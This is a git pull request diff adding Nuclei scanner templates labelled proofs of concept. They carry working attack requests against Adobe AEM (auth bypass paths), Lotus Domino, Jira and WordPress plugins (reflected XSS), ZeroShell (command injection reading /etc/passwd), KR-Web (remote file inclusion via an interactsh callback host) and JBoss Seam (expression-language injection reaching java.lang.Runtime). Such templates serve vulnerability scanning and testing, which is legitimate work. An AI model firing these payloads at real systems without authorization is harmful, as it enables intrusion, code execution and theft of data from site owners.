Merge pull request #1 from BabelQwerty/dev

add some nuclei pocs

nuclei_pocs/AEM_misconfig.yaml

@@ -0,0 +1,33 @@
+id: aem-misconfigs
+
+info:
+ name: Misconfigs and Auth bypasses for older unpatched AEM versions not an exhaustive list but ones Ive had luck with
+ author: panch0r3d
+ severity: high
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/apps/system/config/.tidy.-1.json?.css"
+ - "{{BaseURL}}/bin/querybuilder.json?path=/apps/system/config&p.hits=full&p.limit=-1?.js"
+ - "{{BaseURL}}/crx/de/index.jsp?.js"
+ - "{{BaseURL}}/crx/explorer/browser/index.jsp?.css"
+ - "{{BaseURL}}/crx/packmgr/index.jsp?.json"
+ - "{{BaseURL}}/bin/querybuilder.json?fulltext=web&p.limit=300&p.start=1?.html"
+ - "{{BaseURL}}/bin/querybuilder.json?p.hits=selective&p.properties=jcr%3alastModifiedBy&property=jcr%3alastModifiedBy&property.operation=unequals&property.value=admin&type=nt%3abase&p.limit=1000&p.start=1?.js"
+ - "{{BaseURL}}/libs/granite/core/content/login.html?.ico"
+ - "{{BaseURL}}/etc/reports/diskusage.html?.html"
+ - "{{BaseURL}}///crx///de///index.jsp?.css"
+ - "{{BaseURL}}///bin///querybuilder.json?fulltext=web&p.limit=300&p.start=1?.html"
+ headers:
+ User-Agent: "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0"
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - '(success).*?["][:](true).*?["](results)'
+ - '(CRXDE).(Lite)'
+ - '(Content).(Explorer)'
+ - '(CRX).(Package).(Manager)'
+ - '(Adobe)'
+ part: body

nuclei_pocs/CVE-2005-2428.yaml

@@ -0,0 +1,21 @@
+id: cve-2005-2428
+info:
+ name: Lotus Domino Sensitive Information Leak
+ risk: Medium
+
+params:
+ - root: '{{.BaseURL}}'
+
+requests:
+ - method: GET
+ redirect: false
+ url: >-
+ {{.root}}/names.nsf/People?OpenView
+ headers:
+ - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
+ detections:
+ - >-
+ StatusCode() == 200 && RegexSearch('resBody', '(<a href\=\"/names\.nsf/[0-9a-z\/]+\?OpenDocument)')
+
+reference:
+ - link: https://www.cvebase.com/cve/2005/2428

nuclei_pocs/CVE-2007-0885.yaml

@@ -0,0 +1,26 @@
+id: CVE-2007-0885
+
+info:
+ name: Rainbow.Zen Jira XSS
+ description: Cross-site scripting (XSS) vulnerability in jira/secure/BrowseProject.jspa in Rainbow with the Zen (Rainbow.Zen) extension allows remote attackers to inject arbitrary web script or HTML via the id parameter.
+ reference: https://www.securityfocus.com/archive/1/459590/100/0/threaded
+ author: geeknik
+ severity: medium
+ tags: cve,cve2007,jira,xss
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/jira/secure/BrowseProject.jspa?id=\"><script>alert('{{randstr}}')</script>"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "\"><script>alert('{{randstr}}')</script>"
+ - type: status
+ status:
+ - 200
+ - type: word
+ part: header
+ - "text/html"

nuclei_pocs/CVE-2009-0545.yaml

@@ -0,0 +1,20 @@
+id: CVE-2009-0545
+
+info:
+ name: ZeroShell <= 1.0beta11 Remote Code Execution
+ author: geeknik
+ description: cgi-bin/kerbynet in ZeroShell 1.0beta11 and earlier allows remote attackers to execute arbitrary commands via shell metacharacters in the type parameter in a NoAuthREQ x509List action.
+ reference: https://www.exploit-db.com/exploits/8023
+ severity: critical
+ tags: cve,cve2009,zeroshell,kerbynet,rce
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22"
+
+ matchers:
+ - type: regex
+ part: body
+ regex:
+ - "root:[x*]:0:0:"

nuclei_pocs/CVE-2009-4223.yaml

@@ -0,0 +1,26 @@
+id: CVE-2009-4223
+
+info:
+ name: KR-Web <= 1.1b2 RFI
+ description: KR is a web content-server based on Apache-PHP-MySql technology who gives to internet programmers some PHP classes semplifying database content access. Elsewere, it gives some admin and user tools to write, hyerarchize and authorize contents.
+ reference:
+ - https://sourceforge.net/projects/krw/
+ - https://www.exploit-db.com/exploits/10216
+ author: geeknik
+ severity: high
+ tags: cve,cve2009,krweb,rfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/adm/krgourl.php?DOCUMENT_ROOT=https://{{interactsh-url}}/file.txt"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ part: interactsh_protocol
+ words:
+ - "http"

nuclei_pocs/CVE-2010-1871.yaml

@@ -0,0 +1,23 @@
+id: cve-2010-1871
+info:
+ name: JBoss Seam 2 Code Execution
+ risk: High
+
+params:
+ - root: '{{.BaseURL}}'
+
+variables:
+ - endpoint: |
+ seam-booking/home.seam
+requests:
+ - method: GET
+ redirect: false
+ url: >-
+ {{.root}}/{{.endpoint}}?actionOutcome=/pwn.xhtml?pwned%3d%23{expressions.getClass().forName(%27java.lang.Runtime%27).getDeclaredMethods()[7]}
+ headers:
+ - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
+ detections:
+ - >-
+ StatusCode() == 302 && StringSearch("resHeader", "pwn.seam") && StringSearch("resHeader", "?pwned=")
+references:
+ - https://www.cvebase.com/cve/2010/1871

nuclei_pocs/CVE-2011-4618.yaml

@@ -0,0 +1,29 @@
+id: CVE-2011-4618
+
+info:
+ name: Advanced Text Widget < 2.0.2 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2011-4618
+ tags: cve,cve2011,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/advanced-text-widget/advancedtext.php?page=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "<script>alert(123)</script>"
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200

nuclei_pocs/CVE-2011-4624.yaml

@@ -0,0 +1,29 @@
+id: CVE-2011-4624
+
+info:
+ name: GRAND FlAGallery 1.57 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2011-4624
+ tags: cve,cve2011,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/flash-album-gallery/facebook.php?i=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "<script>alert(123)</script>"
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200

nuclei_pocs/CVE-2011-4926.yaml

@@ -0,0 +1,29 @@
+id: CVE-2011-4926
+
+info:
+ name: Adminimize 1.7.22 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2011-4926
+ tags: cve,cve2011,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/adminimize/adminimize_page.php?page=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "<script>alert(123)</script>"
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200

nuclei_pocs/CVE-2011-5107.yaml

@@ -0,0 +1,29 @@
+id: CVE-2011-5107
+
+info:
+ name: Alert Before Your Post <= 0.1.1 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5107
+ tags: cve,cve2011,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/alert-before-your-post/trunk/post_alert.php?name=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "<script>alert(123)</script>"
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200

nuclei_pocs/CVE-2011-5179.yaml

@@ -0,0 +1,29 @@
+id: CVE-2011-5179
+
+info:
+ name: Skysa App Bar 1.04 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5179
+ tags: cve,cve2011,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/skysa-official/skysa.php?submit=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "<script>alert(123)</script>"
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200

nuclei_pocs/CVE-2011-5181.yaml

@@ -0,0 +1,29 @@
+id: CVE-2011-5181
+
+info:
+ name: ClickDesk Live Support - Live Chat 2.0 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5181
+ tags: cve,cve2011,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "<script>alert(123)</script>"
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200

nuclei_pocs/CVE-2011-5265.yaml

@@ -0,0 +1,29 @@
+id: CVE-2011-5265
+
+info:
+ name: Featurific For WordPress 1.6.2 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5265
+ tags: cve,cve2011,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/featurific-for-wordpress/cached_image.php?snum=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "<script>alert(123)</script>"
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200